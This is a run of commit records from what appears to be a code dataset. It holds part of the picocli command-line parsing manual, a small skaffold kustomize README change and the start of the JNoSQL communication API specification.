types:\n\n[source,java]\n----\ncommandLine.registerConverter(java.nio.file.Path.class, s -> java.nio.file.Paths.get(s));\ncommandLine.registerConverter(java.time.Duration.class, s -> java.time.Duration.parse(s));\n----\n\nAfter registering custom converters, call the `parse(String...)` method on the `CommandLine` instance where the converters are registered. The static `parse` method cannot be used. For example:\n\n[source,java]\n----\nclass App {\n @Parameters Path path;\n @Option(names = \"-d\") Duration duration;\n}\n----\n\n[source,java]\n----\nApp app = new App();\nCommandLine commandLine = new CommandLine(app);\ncommandLine.registerConverter(Path.class, s -> Paths.get(s));\ncommandLine.registerConverter(Duration.class, s -> Duration.parse(s));\n\ncommandLine.parse(\"-d\", \"PT15M\", \"file1.txt\");\nassert app.path.equals(Paths.get(\"file1.txt\"));\nassert app.duration.equals(Duration.parse(\"PT15M\"));\n----\n\n=== Arrays and Collections\n\nIMPORTANT: With array fields picocli uses reflection to discover the array element type, but with collections, Java type erasure means picocli cannot find out the generic type of the collection. For non-String collections, use the `type` attribute to explicitly tell picocli what type to convert the command line arguments to.\n\nMultiple parameters can be captured together in a single array or `Collection` field. When using a collection, use the `type` attribute to specify the collection element type. For example:\n\n[source,java]\n----\nclass Convert {\n @Option(type = java.util.regex.Pattern.class, \/\/ List elements are Pattern objects\n names = \"-patterns\",\n description = \"the regular expressions to use for the conversion\");\n List<Pattern> patterns;\n\n @Parameters(type = File.class, \/\/ convert arguments to File before adding to the List\n description = \"files to convert\")\n List<File> files;\n}\n----\n\n[source,java]\n----\nString[] args = { \"-patterns\", \"a*b\", \"[a-e][i-u]\", \"--\", \"file1.txt\", \"file2.txt\" };\nConvert convert = CommandLine.parse(new Convert(), args);\n\n\/\/ convert.patterns now has two Pattern objects\n\/\/ convert.files now has two File objects\n----\n\nNOTE: If a collection is returned from a type converter, picocli will add the values to the field, not the collection itself.\n\n=== Numeric Arguments\nNumeric values are interpreted as decimal numbers by default. If you want picocli to be more flexible, you can\nregister a custom type converter that delegates to the https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Integer.html#decode-java.lang.String-[decode] method to convert strings to numbers.\n\nNOTE: The `decode` method looks at the prefix to determine the radix, so numbers\nstarting with `0x`, `0X` or `#` are interpreted as hexadecimal numbers, numbers starting with `0` are interpreted\nas octal numbers, and otherwise the number is interpreted as a decimal number.\n\nJava 8-style lambdas:\n[source,java]\n----\ncommandLine.registerConverter(Byte.class, s -> Byte::decode);\ncommandLine.registerConverter(Byte.TYPE, s -> Byte::decode);\ncommandLine.registerConverter(Short.class, s -> Short::decode);\ncommandLine.registerConverter(Short.TYPE, s -> Short::decode);\ncommandLine.registerConverter(Integer.class, s -> Integer::decode);\ncommandLine.registerConverter(Integer.TYPE, s -> Integer::decode);\ncommandLine.registerConverter(Long.class, s -> Long::decode);\ncommandLine.registerConverter(Long.TYPE, s -> Long::decode);\n----\n\nIn Java 5 this becomes a bit more verbose:\n[source,java]\n----\nITypeConverter<Integer> intConverter = new ITypeConverter<Integer>() {\n public Integer convert(String s) {\n return Integer.decode(s);\n }\n};\ncommandLine.registerConverter(Integer.class, intConverter);\ncommandLine.registerConverter(Integer.TYPE, intConverter);\n...\n----\n\n\n== Arity\nArity is the number of parameters that will be consumed by an option.\nMost of the time picocli will consume the right number of parameters automatically and you don't need to worry about this.\n\nWhen an option or parameters field has a type that can hold multiple values (an array or a collection),\nthe `arity` attribute lets you control exactly how many parameters are captured by this field.\n\n=== Default Arity\nThe default arity value of a field annotated with `@Option` or `@Parameters` depends on the field's type.\n\n* Boolean fields: arity is zero (no parameter is consumed - the field is set to `true` when the option name is recognized).\n* Single-valued types like `int`, `String`, `File`: arity is one (consume one parameter). Omitting the option parameter results in a ParameterException: \"Missing required parameter for field '<field-name>'\".\n* Multi-valued types like arrays or collections: consume from zero up to all available parameters.\n\n\n=== Boolean Options with Explicit Parameters\nIt is possible to explicitly specify \"true\" or \"false\" as a parameter for a boolean option by defining an explicit <<Arity: Minimum and Maximum Number of Parameters,`arity`>> attribute. A boolean option with `arity = \"0..1\"` accepts zero to one parameters, `arity = \"1\"` means the option _must_ have one parameter. For example:\n\n[source, java]\n----\nclass BooleanOptionWithParameters {\n @Option(names = \"-x\", arity = \"1\", description = \"1 mandatory parameter\")\n boolean x;\n\n @Option(names = \"-y\", arity = \"0..1\", description = \"min 0 and max 1 parameter\")\n boolean y;\n}\n----\n\nThe following ways to invoke the program will be accepted (values are not case sensitive):\n----\n<command> -x true\n<command> -x FALSE\n<command> -x TRUE -y\n<command> -x True -y False\n----\n\nBut trying to specify the `-x` option without a parameter, or with a value other than \"true\" or \"false\" (case insensitive) will result in a `ParameterException`.\n\n=== Arrays and Collections\nOption fields of type array or `List` (or any class extending `Collection`) will be able to hold multiple values.\nBy default, picocli will capture arguments into these fields until it encounters a command line argument that is\nan option name or a registered command name.\n\nThe `arity` attribute can be used to specify the exact number of required parameters, or a range with a minimum and a maximum number of parameters. The maximum can be a fixed number, or can be `\"*\"` to denote \"any number\" of parameters. For example:\n[source, java]\n----\nclass MyProgram {\n @Parameters(arity = \"3\", descriptions = \"exactly three Files\")\n File[] files;\n\n @Option(names = \"-f\", arity = \"2..4\", description = \"two to four floating point numbers\")\n double[] doubles;\n\n @Option(names = \"-s\", arity = \"1..*\", description = \"at least one string\")\n String[] strings;\n}\n----\nA `MissingParameterException` is thrown when fewer than the miminum number of required parameters is specified as command line arguments. Options with an exact number or an exact range will consume up to the maximum number of parameters.\n\nOnce the minimum number of parameters is consumed, picocli will check for each subsequent command line argument whether it is another parameter, or a new option. For example:\n\n----\n<command> -s A B C -f 1.0 2.0 3.0\n----\nThe above command line arguments will be parsed as three parameters for the `-s` option, followed by three parameters for the `-f` option.\n\n=== Ambiguous Input\nPositional parameters do not have an option name, so it is not always easy to decide where they start. The below example command line arguments will be parsed as six parameters for the `-s` option, not as three strings and three files:\n----\n<command> -s A B C file1 file2 file3\n----\n\nUsers can disambiguate the input by specifying a double dash (`--`) after the option parameters.\nThe argument `--` is interpreted as a delimiter indicating the end of options. Any following arguments are treated as positional parameters. For example, the following command line arguments will be parsed as three strings and three files:\n----\n<command> -s A B C -- file1 file2 file3\n----\n\n=== Option-Parameter Separators and Arity\n\nIMPORTANT: A separator clarifies that a parameter belongs to an option, but does not prevent subsequent parameters from also being assigned to the same option. For example:\n\n[source,java]\n----\n@Option(names = \"-opt\", arity = \"2\") List<String> values;\n@Parameters List<String> remainder;\n----\nBecause arity is 2, both parameters in the below example are assigned to the `-opt` option:\n----\n<command> -opt=val1 val2\n----\n\n\n\n== Required Options\n=== Options\nOptions can be marked `required` to make it mandatory for the user to specify them on the command line. When a required option is not specified, a `MissingParameterException` is thrown from the `parse` method. For example:\n[source, java]\n----\nclass MandatoryOption {\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n\n @Parameters\n File[] files;\n}\n----\nThe following command line arguments would result in an exception complaining that `number` is missing:\n----\n\/\/ invalid: missing option -n\n<command> file1 file2 file3\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: required option -n has a value\n<command> -n 123 file1 file2 file3\n----\n\n=== Parameters\nUse the `arity` attribute to make `@Parameters` mandatory:\n[source, java]\n----\nclass BothOptionAndParametersMandatory {\n @Parameters(arity = \"1..*\", descriptions = \"at least one File\")\n File[] files;\n\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n}\n----\nThe following command line arguments would result in an exception complaining that `files` are missing:\n----\n\/\/ invalid: missing file parameters\n<command> -n 123\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: both required fields have a value\n<command> -n 123 file1\n----\n\n\n\n== Help Options\nOptions with the attribute `help = true` are special: if one of the command line arguments is a \"help\" option, picocli will stop parsing the remaining arguments and will not check for required options.\n\n[source,java]\n----\n@Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\nboolean helpRequested;\n----\nThis is suitable for options that should trigger the usage help message or application version information being shown on the console.\n\nIt is the responsibility of the application to check the field and show the usage help message:\n[source,java]\n----\nCompress app = CommandLine.parse(new App(), args);\nif (app.helpRequested) {\n CommandLine.usage(new App(), System.err);\n return;\n}\n----\n\n== Usage Help\n=== Example\nA default picocli usage help message looks like this:\n----\nUsage: cat [-AbeEnstTuv] [--help] [--version] [FILE...]\nConcatenate FILE(s), or standard input, to standard output.\n FILE Files whose contents to display\n -A, --show-all equivalent to -vET\n -b, --number-nonblank number nonempty output lines, overrides -n\n -e equivalent to -vET\n -E, --show-ends display $ at end of each line\n -n, --number number all output lines\n -s, --squeeze-blank suppress repeated empty output lines\n -t equivalent to -vT\n -T, --show-tabs display TAB characters as ^I\n -u (ignored)\n -v, --show-nonprinting use ^ and M- notation, except for LDF and TAB\n --help display this help and exit\n --version output version information and exit\nCopyright(c) 2017\n----\n\nThe usage help message is generated from annotation attributes, like below:\n[source,java]\n----\n@Command(name = \"cat\", footer = \"Copyright(c) 2017\",\n description = \"Concatenate FILE(s), or standard input, to standard output.\")\nclass Cat {\n\n @Parameters(paramLabel = \"FILE\", description = \"Files whose contents to display\")\n List<File> files;\n\n @Option(names = \"--help\", help = true, description = \"display this help and exit\")\n boolean help;\n\n @Option(names = \"-t\", description = \"equivalent to -vT\") boolean t;\n @Option(names = \"-e\", description = \"equivalent to -vET\") boolean e;\n @Option(names = {\"-A\", \"--show-all\"}, description = \"equivalent to -vET\") boolean all;\n\n \/\/ ...\n}\n----\n\n=== Command Name\nIn the above example, the program name is taken from the `name` attribute of the `Command` annotation:\n[source,java]\n----\n@Command(name = \"cat\")\n----\nWithout a `name` attribute, picocli will show a generic `<main class>` in the synopsis:\n----\nUsage: <main class> [-AbeEnstTuv] [--help] [--version] [FILE...]\n----\n=== Parameter Labels\nNon-boolean options require a value. The usage help should explain this, and picocli shows the option parameter\nin the synopsis and in the option list. By default, the field name is shown in `<` and `>` fish brackets.\nUse the `paramLabel` attribute to display a different name. For example:\n----\nUsage: <main class> [-f=FILE] [-n=<number>] NUM <host>\n NUM number param\n host the host parameter\n -f= FILE a file\n -n= <number> a number option\n----\nSome annotated fields in the below example class have a `paramLabel` attribute and others don't:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass ParamLabels {\n @Option(names = \"-f\", paramLabel = \"FILE\", description = \"a file\") File f;\n @Option(names = \"-n\", description = \"a number option\") int number;\n @Parameters(index = \"0\", paramLabel = \"NUM\", description = \"number param\") int n;\n @Parameters(index = \"1\", description = \"the host parameter\") InetAddress host;\n}\n----\nNOTE: For demonstration purposes the above example mixes the all-uppercase (e.g., `NUM`) style label and the fish bracket (e.g., `<number>`) style labels. For real applications, mixing these label styles should be avoided. An application should consistently use only one style.\n\n=== Hidden Options and Parameters\nOptions and Parameters with the `hidden` attribute set to `true` will not be shown in the usage help message.\nThis is useful for example when a parameter at some index is captured into multiple fields:\nby default each of these fields would be shown in the usage message, which would be confusing for users.\n\nFor example, the `all` field below is annotated as `hidden = true`:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass App {\n @Parameters(index = \"0\", description = \"destination host\") InetAddress host;\n @Parameters(index = \"1\", description = \"destination port\") int port;\n @Parameters(index = \"2..*\", description = \"files to transfer\") String[] files;\n\n @Parameters(hidden = true) String[] all;\n}\n----\nThe above will generate the following usage help message, where the `all` field is not shown:\n----\nUsage: <main class> <host> <port> [<files>...]\n host destination host\n port destination port\n files files to transfer\n----\n\n\n== Customizing Usage Help\n=== Example\nThe below example demonstrates what a customized usage message can look like.\nNote how section headings with line separators can create a more spacious usage message,\nand also that options are listed in declaration order (instead of in alphabetic order).\n----\nUsage:\n\nRecord changes to the repository.\n\ngit-commit [-ap] [--fixup=<commit>] [--squash=<commit>] [-c=<commit>]\n [-C=<commit>] [-F=<file>] [-m[=<msg>...]] [<files>...]\n\nDescription:\n\nStores the current contents of the index in a new commit along with a log\nmessage from the user describing the changes.\n\nParameters:\n <files> the files to commit\n\nOptions:\n -a, --all Tell the command to automatically stage files\n that have been modified and deleted, but new\n files you have not told Git about are not\n affected.\n -p, --patch Use the interactive patch selection interface to\n chose which changes to commit\n -C, --reuse-message=<commit>\n Take an existing commit object, and reuse the log\n message and the authorship information\n (including the timestamp) when creating the\n commit.\n -c, --reedit-message=<commit>\n Like -C, but with -c the editor is invoked, so\n that the user canfurther edit the commit\n message.\n --fixup=<commit> Construct a commit message for use with rebase\n --autosquash.\n --squash=<commit> Construct a commit message for use with rebase\n --autosquash. The commitmessage subject line is\n taken from the specified commit with a prefix\n of \"squash! \". Can be used with additional\n commit message options (-m\/-c\/-C\/-F).\n -F, --file=<file> Take the commit message from the given file. Use\n - to read the message from the standard input.\n -m, --message[=<msg>...] Use the given <msg> as the commit message. If\n multiple -m options are given, their values are\n concatenated as separate paragraphs.\n----\n\n=== Section Headings\nThe above spacious layout is mainly due to the section headings:\n[code,java]\n----\n@CommandLine.Command(name = \"git-commit\",\n sortOptions = false,\n headerHeading = \"Usage:%n%n\",\n synopsisHeading = \"%n\",\n descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n\",\n optionListHeading = \"%nOptions:%n\",\n header = \"Record changes to the repository.\",\n description = \"Stores the current contents of the index in a new commit \" +\n \"along with a log message from the user describing the changes.\")\nclass GitCommit { ... }\n----\n\n=== Unsorted Option List\nBy default the options list displays options in alphabetical order. Use the `sortOptions = false` attribute to display options in the order they are declared in your class.\n\n\n=== Show Default Values\nUse the `showDefaultValues = true` attribute to append the default value of the options and positional parameters to the description column.\n\n=== Abbreviated Synopsis\n=== Custom Synopsis\n=== Command Header and Description\n=== Footer\n=== Option-Parameter Separators\n\n=== Reordering Sections\nTo reorder sections of the usage message, you need to use the `CommandLine.Help` class directly. The `CommandLine::usage` method implementation looks like this:\n\n[source,java]\n----\nMap<String, Object> subcommandMap = new HashMap<String, Object>();\nsubcommandMap.put(\"add\", new AddCommand());\n...\nHelp help = new Help(new MainClass()).addAllCommands(subcommandMap);\nStringBuilder sb = new StringBuilder()\n .append(help.headerHeading())\n .append(help.header())\n .append(help.synopsisHeading()) \/\/e.g. Usage:\n .append(help.synopsis()) \/\/e.g. <main> [OPTIONS] [ARGUMENTS]\n .append(help.descriptionHeading()) \/\/e.g. %nDescription:%n%n\n .append(help.description()) \/\/e.g. \"application description\"\n .append(help.parameterListHeading()) \/\/e.g. %nPositional parameters:%n%n\n .append(help.parameterList()) \/\/e.g. [FILE...] the files to convert\n .append(help.optionListHeading()) \/\/e.g. %nOptions:%n%n\n .append(help.optionList()) \/\/e.g. -h, --help displays this help\n .append(help.commandListHeading()) \/\/e.g. %nCommands:%n%n\n .append(help.commandList()) \/\/e.g. add adds a to b\n .append(help.footerHeading())\n .append(help.footer());\n----\nIn your application, instead of calling `CommandLine.usage(new MainClass(), System.err)`, you can alter the above code to, for example, list subcommands first, then global options and finally the parameters.\n\n=== Formatted Headings\nBy using the `Help` class directly as explained in the previous section,\nthe `xxxHeading()` methods can be passed arguments.\nThese arguments can be referenced by the format specifiers in the heading https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/Formatter.html[format strings]. For example:\n\n[source,java]\n----\n@Command(descriptionHeading = \"%nDescription (%1$tb %1$te, %1$tY)%n%n\")\nclass MainClass {}\n----\nThe `descriptionHeading` attribute is a format string with some date\/time conversion format specifiers and some line separators. Picocli will format this string with any arguments that are passed to the `Help::descriptionHeading(Object...)` method. For example:\n[source,java]\n----\nHelp help = new Help(new MainClass());\nCalendar c = new GregorianCalendar(2017, MAY, 23);\nString formatted = help.descriptionHeading(c);\n\nassert \"\\nDescription (May 23, 2017)\\n\\n\".equals(formatted);\n----\n\n\n\n== Advanced Usage Help Customization\n=== Custom Layout\n=== Table and Columns\n=== Option Renderer\n=== Parameter Renderer\n=== Param Label Renderer\n\n\n== Subcommands\n=== Registering Subcommands\n=== Usage Help for Subcommands\n\n\n\n== Subclassing to Reuse Options and Command Attributes\nPicocli will walk the class hierarchy to check for annotations, so you can declare common @Options and @Command attributes on a superclass and override these fields or attributes on a subclass.\n\nThe below example shows how common options like `help` and `version` can be declared as fields in a superclass so they are available in all subclasses. Similarly, annotating the superclass with default `@Command` attributes means subclasses won't need to set these attributes.\n\n[source,java]\n----\n@Command(synopsisHeading = \"%nUsage:%n%n\", descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n%n\", optionListHeading = \"%nOptions:%n%n\",\n commandListHeading = \"%nCommands:%n%n\", showDefaultValues = false)\npublic abstract class AbstractCommand {\n\n @Option(names = { \"-h\", \"-?\", \"--help\" }, help = true,\n description = \"give this help list\")\n protected boolean helpRequested;\n\n @Option(names = { \"-V\", \"--version\" }, help = true,\n description = \"print program version\")\n protected boolean versionRequested;\n}\n----\n\nAll commands that extend `AbstractCommand` support the `--help` and `--version` options, and generate a usage help message in the same spacious style. For example:\n\n[source,java]\n----\n@Command(name = \"zip\",\n header = \"Compresses the specified FILE(s).\",\n description = \"The default action is to add or replace zipfile entries from list, \" +\n \"which can include the special name - to compress standard input.\",\n footer = \"Copyright (c) 1990-2008 Info-ZIP - Type 'zip \"-L\"' for software license.\")\npublic class ZipCommand extends AbstractCommand {\n @Option(names = { \"-o\", \"--output\" }, description = \"output file to write to\")\n private File output;\n\n @Parameter(paramLabel = \"FILE\", description = \"FILEs to compress\")\n private File[] files;\n}\n----\n\n\n== Putting it all Together\nImagine an application that takes some input files and compresses them to an output file.\n----\nCompress -o outputFile file1 file2 file3\n----\nThe program takes one option (`-o`, the output file) and one or more input files.\nOne way to accomplish this with picocli looks like this:\n\n[source, java]\n----\nimport picocli.CommandLine.*;\nimport java.io.File;\n\n@Command(name = \"Compress\", header = \"Compresses the specified input files to an output file\")\npublic class Compress {\n @Parameters(arity = \"1..*\", description = \"one or more files to compress\")\n File[] inputFiles;\n\n @Option(names = {\"-o\", \"--outfile\"}, description = \"optional output file name. If omitted directory name is used.\")\n File outputFile;\n\n @Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\n boolean helpRequested;\n\n public static void main(String... args) {\n try {\n Compress compress = CommandLine.parse(new Compress(), args);\n if (compress.helpRequested) {\n CommandLine.usage(new Compress(), System.err);\n return;\n }\n doCompress();\n } catch (ParseException ex) {\n System.err.println(ex.getMessage());\n CommandLine.usage(new Compress(), System.err);\n }\n }\n\n private void doCompress() { ... } \/\/ business logic of the application\n}\n----\n\n\n== Download\n\nNOTE: Here is the source. Copy and paste it into a file called `CommandLine.java`, add it to your project, and enjoy!\n\n[source,java]\n----\ninclude::..\/src\/main\/java\/picocli\/CommandLine.java[]\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2641e9676afdfa57e9a0a106ae2d3a29851e010","subject":"Update README.adoc","message":"Update README.adoc","repos":"GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold","old_file":"integration\/examples\/kustomize\/README.adoc","new_file":"integration\/examples\/kustomize\/README.adoc","new_contents":"=== Example: kustomize\n:icons: font\n\nThis is an example demonstrating how skaffold can work with kustomize with the `skaffold deploy` command.\n\nifndef::env-github[]\n==== Example files\nlink:{github-repo-tree}\/examples\/kustomize[see on Github icon:github[]]\n\n[source,yaml, indent=3, title=skaffold.yaml]\n----\ninclude::skaffold.yaml[]\n----\n\n[source,yaml, indent=3, title=kustomization.yaml]\n----\ninclude::kustomization.yaml[]\n----\n\n[source,patch, indent=3, title=patch.yaml]\n----\ninclude::patch.yaml[]\n----\n\n[source,patch, indent=3, title=deployment.yaml]\n----\ninclude::deployment.yaml[]\n----\n\nendif::[]\n\n=== Example: passing arguments to kustomize\n:icons: font\n\nThis is an example demonstrating how additional arguments can be passed to the `kustomize build` command.\n\nifndef::env-github[]\n\n[source,yaml, indent=3, title=skaffold-kustomize-args.yaml]\n----\ninclude::skaffold-kustomize-args.yaml[]\n----\n\nendif::[]\n","old_contents":"=== Example: kustomize\n:icons: font\n\nThis is an example demonstrating how skaffold can work with kustomize with the `skaffold deploy` command.\n\nifndef::env-github[]\n==== Example files\nlink:{github-repo-tree}\/examples\/kustomize[see on Github icon:github[]]\n\n[source,yaml, indent=3, title=skaffold.yaml]\n----\ninclude::skaffold.yaml[]\n----\n\n[source,yaml, indent=3, title=kustomization.yaml]\n----\ninclude::kustomization.yaml[]\n----\n\n[source,patch, indent=3, title=patch.yaml]\n----\ninclude::patch.yaml[]\n----\n\n[source,patch, indent=3, title=deployment.yaml]\n----\ninclude::deployment.yaml[]\n----\n\nendif::[]\n\n=== Example: passing arguments to kustomize\n:icons: font\n\nThis is an example demonstrating how additional arguments can be passed to kustomize\n\nifndef::env-github[]\n\n[source,yaml, indent=3, title=skaffold-kustomize-args.yaml]\n----\ninclude::skaffold-kustomize-args.yaml[]\n----\n\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57cf8ede3cf460a13ef08d9f2a6977f24b88353a","subject":"fixes communi","message":"fixes communi\n","repos":"JNOSQL\/diana","old_file":"specification\/src\/main\/asciidoc\/communication.adoc","new_file":"specification\/src\/main\/asciidoc\/communication.adoc","new_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== Communication API Introduction\n\n\nWith the strategy to divide and conquer on JNoSQL, the communication API was born. It has the goal to make the communication layer easy and extensible. The extensibility is more than important, that is entirely necessary once the API must support specific feature in each database. Nonetheless, the advantage of a common API in a change to another database provider has lesser than using the specific API.\n\nTo cover the three kinds of database, this API has three packages, one for each database.\n\n* `org.jnosql.diana.column`\n* `org.jnosql.diana.document`\n* `org.jnosql.diana.key`\n\nIMPORTANT: The package name might change on the Jakarta EE process.\n\nThere isn't a communication API because of the Graph API already does exist, that is link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop].\n\nSo, if a database is multi-model, has support to more than one database, it will implement an API to each database which it supports. Also, each API has the TCK to prove if the database is compatible with the API. Even from different NoSQL types, it tries to use the same nomenclature:\n\n* Configuration\n* Factory\n* Manager\n* Entity\n* Value\n\n=== The API structure\n\nThe communication has four projects:\n\n* The *communication-core*: The JNoSQL API communication common to all types.\n* The *communication-key-value*: The JNoSQL communication API layer to key-value database.\n* The *communication-column*: The JNoSQL communication API layer to column database.\n* The *communication-document*: The JNoSQL communication API layer to document database.\n\nEach module works separately; thereby, a NoSQL vendor just needs to implement the specific type, e.g., a key-value provider will apply a key-value API. If a NoSQL already has a driver, this API can work as an adapter with the current one. To multi-model NoSQL, providers will implement the API which they need.\n\nWARNING: To the Graph communication API, there is the link:http:\/\/tinkerpop.apache.org\/[Apache TinkerPop] that won\u2019t be covered in this documentation.\n\n\n=== Value\n\nThis interface represents the value that will store, that is a wrapper to be a bridge between the database and the application. E.g. If a database does not support a Java type, it may do the conversion with ease.\n\n[source,java]\n----\nValue value = Value.of(12);\n----\n\nThe Value interface has the methods:\n\n* `Object get();` Returns the value as Object\n\n* `<T> T get(Class<T> clazz);` Does the conversion process to the required type that is the safer way to do it. If the type required doesn\u2019t have support, it will throw an exception, although the API allows to create custom converters.\n\n* `<T> T get(TypeSupplier<T> typeSupplier);` Similar to the previous method, it does the conversion process but using a structure that uses generics such as List, Map, Stream and Set.\n\n[source,java]\n----\nValue value = Value.of(12);\nString string = value.get(String.class);\nList<Integer> list = value.get(new TypeReference<List<Integer>>() {});\nSet<Long> set = value.get(new TypeReference<Set<Long>>() {});\nStream<Integer> stream = value.get(new TypeReference<Stream<Integer>>() {});\nObject integer = value.get();\n----\n\n==== Make custom Writer and Reader\n\nAs mentioned before, the `Value` interface is to store the cost information into a database. The API already has support to the Java type such as primitive types, wrappers types, new Java 8 date time. Furthermore, the developer can create a custom converter easily and quickly. It has two interfaces:\n\n\n* `ValueWriter`: This interface represents a `Value` instance to write in a database.\n* `ValueReader`: This interface represents how the `Value` will convert to Java application. This interface will use the `<T> T get(Class<T> clazz)` and <T> T `get(TypeSupplier<T> typeSupplier)`.\n\nBoth class implementations load from Java SE ServiceLoader resource. So, to Communication API learn a new type, just register on ServiceLoader, e.g., Given a Money type:\n\n[source,java]\n----\npublic class Money {\n\n private final String currency;\n\n private final BigDecimal value;\n\n Money(String currency, BigDecimal value) {\n this.currency = currency;\n this.value = value;\n }\n\n public String getCurrency() {\n return currency;\n }\n\n public BigDecimal getValue() {\n return value;\n }\n\n @Override\n public String toString() {\n return currency + ' ' + value;\n }\n\n public static Money parse(String text) {\n String[] texts = text.split(\" \");\n return new Money(texts[0], BigDecimal.valueOf(Double.valueOf(texts[1])));\n }\n}\n----\n\nJust to be more didactic, the book creates a simple money representation. As everyone knows, that is not a good practice reinventing the wheel, so in production, the Java Developer must use mature Money APIs such as link:https:\/\/github.com\/JavaMoney[Moneta] that is the reference implementation of link:https:\/\/jcp.org\/en\/jsr\/detail?id=354[JSR 354].\n\nThe first step is to create the converter to a custom type database, the `ValueWriter`. It has two methods:\n\n* `boolean isCompatible(Class clazz)`: Check if the given class has support for this implementation.\n* `S write(T object)`: Once the implementation supports the type, the next step converts a `T` instance to `S` type.\n\n\n[source,java]\n----\npublic class MoneyValueWriter implements ValueWriter<Money, String> {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public String write(Money money) {\n return money.toString();\n }\n}\n----\n\nWith the `MoneyValueWriter` created and the Money type will save as String, then the next step is read information to Java application. As can be seen, a `ValueReader` implementation. This interface has two methods:\n\n* `boolean isCompatible(Class clazz)`; Check if the given class has support for this implementation.\n* `<T> T read(Class<T> clazz, Object value)`; Converts to the `T` type from Object instance.\n\n[source,java]\n----\npublic class MoneyValueReader implements ValueReader {\n\n @Override\n public boolean isCompatible(Class clazz) {\n return Money.class.equals(clazz);\n }\n\n @Override\n public <T> T read(Class<T> clazz, Object value) {\n return (T) Money.parse(value.toString());\n }\n}\n----\n\nAfter both implementations are done, the last step is to register them into two files:\n\n* `META-INF\/services\/org.jnosql.ValueReader`\n* `META-INF\/services\/org.jnosql.ValueWriter`\n\nEach file will have the qualifier of this respective implementation:\n\nThe file `org.jnosql.ValueReader` will have:\n\n```\nmy.company.MoneyValueReader\n```\n\nThe file `org.jnosql.ValueWriter` will have:\n\n```\nmy.company.MoneyValueWriter\n```\n\n[source,java]\n----\nValue value = Value.of(\"BRL 10.0\");\nMoney money = value.get(Money.class);\nList<Money> list = value.get(new TypeReference<List<Money>>() {});\nSet<Money> set = value.get(new TypeReference<Set<Money>>() {});;\n----\n\n\n=== Element Entity\n\nThe *Element entity* is a small piece of a body, except a key-value structure type, once this structure is simple. E.g. The column family structure, the entity has columns, element entity with column has a tuple where the key is the name, and the value is the information as a `Value` implementation.\n\n* *Document*\n* *Column*\n\n\n==== Document\n\nThe `Document` is a small piece of a Document entity. Each document has a tuple where the key is the document name, and the value is the information itself as `Value`.\n\n[source,java]\n----\nDocument document = Document.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nThe document might have another document inside; the subdocument concept.\n\n[source,java]\n----\nDocument subDocument = Document.of(\"subDocument\", document);\n----\n\nThe way to store information in subdocuments will also depend on each driver's implementation.\n\nTo access the information from `Document`, it has an alias method to `Value`; in other words, it does a conversion directly from `Document` _interface_.\n\n[source,java]\n----\nDocument age = Document.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n\n==== Column\n\nThe Column is a small piece of the column family entity. Each column has a tuple where the name represents a key and the value itself as a `Value` implementation.\n\n[source,java]\n----\nColumn document = Column.of(\"name\", \"value\");\nValue value = document.getValue();\nString name = document.getName();\n----\n\nWith this interface, we may have a column inside a column.\n\n\n[source,java]\n----\nColumn subColumn = Column.of(\"subColumn\", column);\n----\n\nThe way to store a subcolumn will also depend on each driver's implementation as well as the information.\n\nTo access the information from `Column`, it has an alias method to `Value`; thus, you can do a conversion directly from `Column` _interface_.\n\n[source,java]\n----\nColumn age = Column.of(\"age\", 29);\nString ageString = age.get(String.class);\nList<Integer> ages = age.get(new TypeReference<List<Integer>>() {});\nObject ageObject = age.get();\n----\n\n=== Entity\n\nThe Entity is the body of the information that goes to the database; each database has an Entity:\n\n* ColumnEntity\n* DocumentEntity\n* KeyValueEntity\n\n==== ColumnFamilyEntity\n\nThe `ColumnFamilyEntity` is an entity to column family database type. It is composed of one or more columns. As a result, the Column is a tuple of name and value.\n\n[source,java]\n----\nColumnEntity entity = ColumnEntity.of(\"columnFamily\");\nentity.add(Column.of(\"id\", Value.of(10L)));\nentity.add(Column.of(\"version\", 0.001));\nentity.add(Column.of(\"name\", \"Diana\"));\nentity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n\nList<Column> columns = entity.getColumns();\nOptional<Column> id = entity.find(\"id\");\n----\n\n==== DocumentEntity\n\nThe `DocumentEntity` is an entity to document collection database type. It is composed of one or more documents. As a result, the Document is a tuple of name and value.\n\n[source,java]\n----\nDocumentEntity entity = DocumentEntity.of(\"documentFamily\");\nString name = entity.getName();\nentity.add(Document.of(\"id\", Value.of(10L)));\nentity.add(Document.of(\"version\", 